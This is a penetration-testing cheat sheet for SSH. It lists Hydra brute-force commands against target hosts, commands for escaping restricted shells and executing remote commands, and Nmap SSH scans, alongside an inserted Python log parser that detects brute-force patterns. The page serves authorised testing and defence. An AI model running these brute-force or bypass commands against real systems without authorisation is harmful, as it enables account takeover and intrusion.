Introduction
SSH (Secure Shell) is a protocol for secure remote access and file transfer between systems. It encrypts all communications, protecting against eavesdropping and attacks. SSH uses a client-server model and supports both password and key-based authentication.
SSH Connection Management
Use the following commands to establish SSH connections.
Connection Type | Command | Description |
---|---|---|
Password Auth | ssh -p 22 [USERNAME]@[TARGET-IP] | Connects to an SSH server using a password. |
Private Key Auth | chmod 600 PATH/TO/PRIVATE-KEY then ssh -i PATH/TO/PRIVATE-KEY [USERNAME]@[TARGET-IP] | Sets the correct permissions for a private key and uses it to establish an SSH connection. |
Brute-Forcing SSH Credentials
Hydra can be used to brute-force SSH logins under different scenarios:
Scenario | Command |
---|---|
Unknown User | hydra -L user.txt -p "Password" -f [TARGET-IP] ssh |
Unknown Password | hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] ssh |
Unknown User and Password | hydra -L user.txt -P /opt/rockyou.txt -f [TARGET-IP] ssh |
Different Port | hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] ssh -s 9999 |
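As the defender's counterpart to the table above, this added example (not part of the original page) reads sshd "Failed password" log lines and labels each noisy source by which of the three scenarios it resembles. The log lines, addresses, the `classify_sources` name and the threshold of 4 are constructed assumptions.

```python
import re
from collections import defaultdict

# Greedy user match plus end anchor: the source address is always read from the
# tail of the line, so a crafted username containing " from 10.0.0.1 port 1"
# cannot spoof it.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(.*) from (\S+) port \d+ ssh2$")

def classify_sources(log_text, threshold=4):
    """Return {source_ip: (pattern, attempts, distinct_users)} for noisy sources."""
    attempts = defaultdict(int)
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            attempts[src] += 1
            users[src].add(user)
    findings = {}
    for src, n in attempts.items():
        if n < threshold:          # a few failures is normal typo noise
            continue
        distinct = len(users[src])
        if distinct == 1:
            pattern = "unknown-password"           # one account, many passwords
        elif distinct == n:
            pattern = "unknown-user"               # many accounts, one try each
        else:
            pattern = "unknown-user-and-password"  # many accounts, several tries each
        findings[src] = (pattern, n, distinct)
    return findings

def _fail(user, src, invalid=False):
    # Builds one constructed log line in OpenSSH's "Failed password" format.
    who = ("invalid user " if invalid else "") + user
    return f"Jan 10 10:00:00 host sshd[4242]: Failed password for {who} from {src} port 50000 ssh2"

# Constructed sample log; addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = "\n".join(
    [_fail("root", "203.0.113.5") for _ in range(5)]
    + [_fail(u, "198.51.100.7", invalid=True) for u in ("admin", "test", "oracle", "git")]
    + [_fail(u, "192.0.2.9") for u in ("alice", "bob", "alice", "bob")]
    + [_fail("carol", "192.0.2.50")]
    + [_fail("x from 10.0.0.1 port 1 ssh2", "192.0.2.50", invalid=True)]
    + ["Jan 10 10:00:09 host sshd[4242]: Accepted password for carol from 192.0.2.50 port 50000 ssh2"]
)

if __name__ == "__main__":
    for src, (pattern, n, distinct) in sorted(classify_sources(SAMPLE_LOG).items()):
        print(f"{src}: {pattern} ({n} failures, {distinct} usernames)")
```

The classification keys on the sshd log, so it applies regardless of which port the server listens on.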
Bypassing SSH Restrictions
Useful techniques for executing commands or scripts over SSH:
Scenario | Command |
---|---|
Escaping to Another Shell | sshpass -p '[PASSWORD]' ssh [USERNAME]@[TARGET-IP] -t bash |
Remote Command Execution | ssh [USERNAME]@[TARGET-IP] 'echo "[COMMAND-HERE]"' |
Execute Local Script Remotely | ssh [USERNAME]@[TARGET-IP] 'bash -s' < /path/to/local_script.sh |
Nmap NSE Scripts for SSH
Nmap includes NSE scripts written specifically for SSH that discover vulnerabilities or gather information.
Task | Command | Description |
---|---|---|
Discovering SSH-related Scripts | ls /usr/share/nmap/scripts/ \| grep "ssh" | Lists all Nmap NSE scripts related to SSH. This helps in selecting the appropriate scripts for targeted SSH testing. |
Run SSH NSE Scripts | nmap -p 22 --script "ssh*" [TARGET-IP] | Executes SSH-related Nmap scripts against a target IP on port 22 for comprehensive vulnerability scanning and information gathering. |